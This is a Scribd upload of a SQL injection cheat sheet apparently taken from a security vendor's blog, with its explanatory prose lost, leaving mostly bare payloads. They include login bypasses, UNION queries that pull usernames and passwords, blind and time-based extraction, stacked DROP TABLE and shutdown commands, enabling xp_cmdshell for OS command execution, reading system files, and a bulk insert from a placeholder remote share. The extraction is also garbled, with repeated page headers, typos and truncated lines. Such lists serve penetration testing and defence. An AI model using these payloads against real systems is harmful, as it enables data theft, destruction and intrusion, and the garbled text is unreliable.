Scribd
Upload
96 views21 pages

SQL Injection Techniques Cheat Sheet

This document provides a cheat sheet of SQL injection payloads for exploiting vulnerabilities in different SQL databases. It includes examples of comments, strings, hexadecimal values, unions, stored procedures and other techniques that can be used to manipulate SQL queries and potentially access unauthorized data or execute commands. The payloads demonstrated various ways to terminate strings, bypass input filtering, perform union queries, make stored procedure calls and more.

Uploaded by

quantumk
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
96 views21 pages

SQL Injection Techniques Cheat Sheet

This document provides a cheat sheet of SQL injection payloads for exploiting vulnerabilities in different SQL databases. It includes examples of comments, strings, hexadecimal values, unions, stored procedures and other techniques that can be used to manipulate SQL queries and potentially access unauthorized data or execute commands. The payloads demonstrated various ways to terminate strings, bypass input filtering, perform union queries, make stored procedure calls and more.

Uploaded by

quantumk
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

1 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

2 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

--
DROP sampletable;--

#
DROP sampletable;#

admin'--

SELECT * FROM members WHERE username = 'admin'--' AND password =


'password'

/*Comment Here*/
DROP/*comment*/sampletable

DR/**/OP/*bypass blacklisting*/sampletable

SELECT/*avoid-spaces*/password/**/FROM/**/Members

/*! MYSQL Special SQL *

SELECT /*!32302 1/0, */ 1 FROM tablename

10; DROP TABLE members /*


10; DROP
TABLE members --

SELECT /*!32302 1/0, */ 1 FROM tablename

/*! 32302 10*/

3 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

10

SELECT /*!32302 1/0, */ 1 FROM tablename

;
SELECT * FROM members; DROP members--

10;DROP members --

SELECT * FROM products WHERE id = 10; DROP members--

IF(condition,true-part,false-part)

4 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

SELECT IF(1=1,'true','false')

IF condition true-part ELSE false-part


IF (1=1) SELECT 'true' ELSE SELECT 'false'

BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END;
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;

SELECT CASE WHEN condition THEN true-part ELSE false-part


SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select


1/0

0xHEXNUMBER

SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45

+
SELECT login + '-' + password FROM members

||
SELECT login || '-' || password FROM members

CONCAT()

5 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

CONCAT(str1, str2, str3, ...)

SELECT CONCAT(login, password) FROM members

CHAR() CONCAT()

0x457578
SELECT 0x457578

SELECT CONCAT('0x',HEX('c:\\boot.ini'))

CONCAT()
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

SELECT CHAR(75)+CHAR(76)+CHAR(77)

SELECT CHR(75)||CHR(76)||CHR(77)

SELECT (CHaR(75)||CHaR(76)||CHaR(77))

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

ASCII()

SELECT ASCII('a')

CHAR()

SELECT CHAR(64)

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members

6 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

field COLLATE SQL_Latin1_General_Cp1254_CS_AS

SELECT header FROM news UNION ALL SELECT name COLLATE


SQL_Latin1_General_Cp1254_CS_AS FROM members

Hex()

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

7 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

admin' AND 1=0 UNION ALL SELECT 'admin',


'81dc9bdb52d04dc20036dbd8313ed055'
1234

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

HAVING 1=1 --

' GROUP BY table.columnfromerror1 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2,


columnfromerror(n) HAVING 1=1 --

ORDER BY 1--

ORDER BY 2--

ORDER BY N--

8 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

' union select sum(columntofind) from users--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.

SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null,


NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULl, NULL--

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --

11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-

Microsoft OLE DB Provider for SQL Server error '80040e07'


Explicit conversion from data type int to image is not allowed.

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

9 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

INSERT INTO members(id, user, pass) VALUES(1,


''+SUBSTRING(@@version,1,10) ,10)

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp


-c -Slocalhost -Usa -Pfoobar

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

EXEC master.dbo.xp_cmdshell 'ping '

master..sysmessages

master..sysservers

masters..sysxlogins
sys.sql_logins

10 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result =


0) SELECT 0 ELSE SELECT 1/0

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

11 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10
;

';shutdown --

EXEC sp_configure 'show advanced options',1


RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1


RECONFIGURE

SELECT name FROM sysobjects WHERE xtype = 'U'

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE


name = 'tablenameforcolumnnames')

NOT IN NOT EXIST


... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name
FROM members)

SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from


(SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE
i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

12 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects


i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE
o.xtype = 'U') as p where p.x=21

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name


FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name =
'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

SELECT table_name FROM information_schema.tables WHERE table_schema =


'tablename'

SELECT table_name, column_name FROM information_schema.columns WHERE


table_schema = 'tablename'

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'

13 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>83--

14 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND


ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)

WAITFOR DELAY '0:0:10'--

WAITFOR DELAY '0:0:0.51'

if (select user) = 'sa' waitfor delay '0:0:10'

1;waitfor delay '0:0:10'--

1);waitfor delay '0:0:10'--

1';waitfor delay '0:0:10'--

1');waitfor delay '0:0:10'--

1));waitfor delay '0:0:10'--

15 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

1'));waitfor delay '0:0:10'--

BENCHMARK(howmanytimes, do this)

IF EXISTS (SELECT * FROM users WHERE username = 'root')


BENCHMARK(1000000000,MD5(1))

IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

SELECT pg_sleep(10);

SELECT sleep(10);

(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100)


THEN dbms_pipe.receive_message(('xyz'),10) ELSE
dbms_pipe.receive_message(('xyz'),1) END FROM dual)

16 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

product.asp?id=4 (SMO)
product.asp?id=5-1

product.asp?id=4 OR 1=1

product.asp?name=Book
product.asp?name=Bo'%2b'ok

product.asp?name=Bo' || 'ok (OM)

product.asp?name=Book' OR 'x'='x

SELECT User,Password FROM mysql.user;

SELECT 1,1 UNION SELECT


IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = 'root';

SEL ECT ... INTO DUMPFILE


Write quer y into a new file (can not modify existing files)

create function LockWorkStation returns integer soname


'user32';

select LockWorkStation();

create function ExitProcess returns integer soname 'kernel32';

select exitprocess();

SELECT USER();

SELECT password,USER() FROM mysql.user;

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE


user_group = 1;

query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

create table foo( line blob );


load data infile 'c:/boot.ini' into table foo;

17 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

select * from foo;

select benchmark( 500000, sha1( 'test' ) );

query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

select if( user() like 'root@%', benchmark(100000,sha1('test')),


'false' );

select if( (ascii(substring(user(),1,1)) >> 7) & 1,


benchmark(100000,sha1('test')), 'false' );

MD5()

SHA1()

PASSWORD()

ENCODE()

COMPRESS()

ROW_COUNT()

SCHEMA()

VERSION()
@@version

' + (SELECT TOP 1 password FROM users ) + '


xx@xx.com

18 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

19 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

20 de 21 21/11/2017 01:13 p. m.
SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

21 de 21 21/11/2017 01:13 p. m.

You might also like